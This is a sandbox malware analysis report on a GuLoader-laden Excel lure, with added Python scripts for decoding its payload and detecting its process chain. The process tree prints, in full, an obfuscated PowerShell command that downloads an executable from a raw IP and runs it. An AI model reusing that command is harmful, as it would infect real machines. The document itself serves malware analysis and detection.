Windows
Analysis Report
Thermo Fisher RFQ_TFS-1805.xls
Overview
General Information
Detection: GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification

Process Tree
- System is w7x64
- EXCEL.EXE (PID: 3492, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
  - mshta.exe (PID: 3756, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
    - cmd.exe (PID: 3856, cmdline: "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      - powershell.exe (PID: 3880, cmdline: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        - csc.exe (PID: 3984, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          - cvtres.exe (PID: 3992, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
        - MeMpEng.exe (PID: 4076, cmdline: "C:\Users\user\AppData\Roaming\MeMpEng.exe", MD5: A80E27FBED396BE3D87FE48DA3C4F266)
  - mshta.exe (PID: 3148, cmdline: C:\Windows\System32\mshta.exe -Embedding, MD5: 95828D670CFD3B16EE188168E083C3C5)
    - cmd.exe (PID: 2740, cmdline: identical to PID 3856 above, MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      - powershell.exe (PID: 3068, cmdline: identical to PID 3880 above, MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        - csc.exe (PID: 2860, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline", MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          - cvtres.exe (PID: 2892, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
        - MeMpEng.exe (PID: 2432, cmdline: "C:\Users\user\AppData\Roaming\MeMpEng.exe", MD5: A80E27FBED396BE3D87FE48DA3C4F266)
- cleanup
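The powershell.exe command line in the tree is the loader's first stage and is read inside out. `[char]` casts stand in for the `::` and `"` characters so that the string `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` never appears in clear; the inner `IEx` only assembles that string, the outer `Iex` runs whatever it decodes, and the bare word `DEvicEcREdeNTIaLdEployment` before the `;` is junk that PowerShell fails to resolve and then continues past. The script below is an added example, not part of the report and not the sandbox's or the malware's code: it undoes both layers statically, never executing anything, and pulls the IOCs out of the decoded stage (the urlmon `URLDownloadToFile` import, the download URL and the drop path, which together account for the csc.exe, cvtres.exe and MeMpEng.exe children). The keyword list used for the case-anomaly check is a constructed one for this example, not Joe Sandbox's.

```python
"""Static triage of the obfuscated PowerShell one-liner in the process tree.

Added example, not part of the Joe Sandbox report and not the malware's code:
nothing is executed. The two obfuscation layers (string pieces glued together
with [char] casts, then a base64 payload) are undone statically and the IOCs
are read out of the decoded stage.
"""
import base64
import re

# Command line of powershell.exe (PID 3880) as recorded in the process tree,
# with the spaces inserted by the report's column wrapping removed (the
# trailing double quote is part of the recorded line). The base64 argument
# is split over adjacent literals only for readability.
CMDLINE = (
    "pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; "
    "Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng("
    "[sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'"
    "JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRF"
    "RmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5k"
    "TGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2Rl"
    "KV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAs"
    "dWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5h"
    "bWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JK"
    "QWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4y"
    "NDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFy"
    "dC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRB"
    "XE1lTXBFbmcuZXhlIg=="
    "'+[CHAr]0X22+'))')))\""
)

# [CHaR]0X3A, [Char]58, ...: a numeric cast that yields a single character.
CHAR_CAST = re.compile(r"\[ch?ar\]\s*(0x[0-9a-f]+|\d+)", re.I)
# '...'+'...': two adjacent single-quoted literals joined with +.
JOIN = re.compile(r"'\s*\+\s*'")
B64_ARG = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.I)


def fold_char_casts(ps):
    """Turn every [char]N into a quoted literal, then merge adjacent literals,
    so '[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8...' reads as
    '[SyStem.TExT.EncODing]::UTF8...' and the hidden call becomes visible."""
    quoted = CHAR_CAST.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", ps)
    return JOIN.sub("", quoted)


def decode_payload(ps):
    """Take the FromBase64String argument out of the folded text and decode it
    the way the script would (UTF-8), without running either IEX."""
    m = B64_ARG.search(fold_char_casts(ps))
    if not m:
        raise ValueError("no FromBase64String(...) argument found")
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def extract_iocs(script):
    """Download URL, drop path and P/Invoke target of the decoded stage, which
    is an Add-Type -MemberDefinition importing URLDownloadToFile from urlmon."""
    def first(pattern):
        m = re.search(pattern, script)
        return m.group(1) if m else None
    return {
        "library": first(r'DllImport\("([^"]+)"'),
        "function": first(r"extern\s+\w+\s+(\w+)\s*\("),
        "url": first(r"""(https?://[^\s"']+)"""),
        "drop_path": first(r'(?i)"(\$env:[^"]+)"'),
    }


# Spellings a "PowerShell case anomaly" check can compare against. A
# constructed list for this example, not the sandbox's own.
CANONICAL = ("powershell", "bypass", "iex", "Add-Type", "FromBase64String",
             "GetString", "Encoding", "Convert", "PassThru")


def case_anomalies(ps):
    """Keyword occurrences whose casing is neither canonical, all-lower,
    all-upper nor capitalised (pOwERShEll, fROMBASE64StRiNG, adD-tYPe).
    Typed commands rarely look like this; obfuscators produce it routinely."""
    normal = {v for w in CANONICAL for v in (w, w.lower(), w.upper(), w.capitalize())}
    return [m.group(0) for w in CANONICAL
            for m in re.finditer(re.escape(w), ps, re.I)
            if m.group(0) not in normal]


if __name__ == "__main__":
    stage = decode_payload(CMDLINE)
    print(re.sub(r" {2,}", " ", stage))  # collapse the space padding
    for key, value in extract_iocs(stage).items():
        print(f"{key:10} {value}")
    print("case anomalies:", ", ".join(case_anomalies(CMDLINE) + case_anomalies(stage)))
```

Run as a script it prints the decoded stage with its space padding collapsed, the four IOCs and the oddly cased keywords. The decoded stage is a P/Invoke definition handed to Add-Type, which compiles it with csc.exe (and cvtres.exe for the resource stub) before calling URLDownloadToFile and starting the dropped file from %APPDATA%; that is the whole reason those three processes sit under powershell.exe in the tree.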
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XOR-encoded. | No Attribution | |
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
System Summary
- Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
- Source: | Author: Michael Haag
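The Sigma matches above are process-creation and file-event rules whose titles appear in the Signatures list (Suspicious Microsoft Office Child Process, Suspicious MSHTA Child Process, Dot net compiler compiles file from suspicious location, and so on). As an added example that is not the Sigma rules themselves and not part of the report, the script below re-implements the parent/child and command-line conditions those rules key on and runs them over a constructed event list mirroring the first Excel → mshta → cmd → powershell branch of the process tree. The parent PIDs and the powershell.exe image path are assumptions taken from the tree's nesting, the long command lines are truncated in the sample data, and the rule labels are this example's own.

```python
"""Process-chain checks modelled on the Sigma matches listed in this report.

Added example, not the Sigma rules and not part of the report. Each check is
the core condition the similarly titled rule keys on, run over constructed
Sysmon-style process-creation events that mirror the first branch of the
process tree (parent PIDs are inferred from the tree's nesting).
"""
import re

# Constructed sample events: (pid, ppid, image, cmdline). The PowerShell image
# path is assumed; the long command lines are truncated with "..." here.
EVENTS = [
    (3492, 1, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    (3756, 3492, r"C:\Windows\System32\mshta.exe",
     r"C:\Windows\System32\mshta.exe -Embedding"),
    (3856, 3756, r"C:\Windows\system32\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C ..."'),
    (3880, 3856, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx("
     "'[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'"
     "+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgx...')))"),
    (3984, 3880, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
     r'@"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"'),
    (3992, 3984, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY ..."),
    (4076, 3880, r"C:\Users\user\AppData\Roaming\MeMpEng.exe",
     r'"C:\Users\user\AppData\Roaming\MeMpEng.exe"'),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SUSP_OFFICE_CHILD = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                     "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
SUSP_MSHTA_CHILD = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                    "rundll32.exe", "regsvr32.exe"}
# Anything under a user's AppData is writable by the user (and by the loader).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_events(events):
    """Return (rule, pid) pairs for every event that trips one of the checks.
    Parent lookup is by ppid, so the same logic works on any log source that
    records the parent process id."""
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, ppid, image, cmd in events:
        name = image_name(image)
        parent = by_pid.get(ppid)
        pname = image_name(parent[2]) if parent else ""
        if pname in OFFICE and name in SUSP_OFFICE_CHILD:
            hits.append(("office_suspicious_child", pid))
        if pname == "mshta.exe" and name in SUSP_MSHTA_CHILD:
            hits.append(("mshta_suspicious_child", pid))
        if name == "csc.exe" and USER_WRITABLE.search(cmd):
            hits.append(("csc_compile_from_user_writable_path", pid))
        if (name == "powershell.exe"
                and re.search(r"\biex\b|invoke-expression", cmd, re.I)
                and re.search(r"frombase64string", cmd, re.I)):
            hits.append(("powershell_iex_of_base64", pid))
        if pname == "powershell.exe" and USER_WRITABLE.search(image):
            hits.append(("powershell_starts_binary_from_user_profile", pid))
    return hits


if __name__ == "__main__":
    for rule, pid in check_events(EVENTS):
        print(f"{pid:>5}  {rule}")
```

Every link of the chain trips a check except cvtres.exe, which is launched by csc.exe itself and is normal whenever csc.exe runs; the csc.exe event is the one to alert on, because Add-Type compilation from a user-writable temp path is what the "Dot net compiler compiles file from suspicious location" match in the Signatures list refers to.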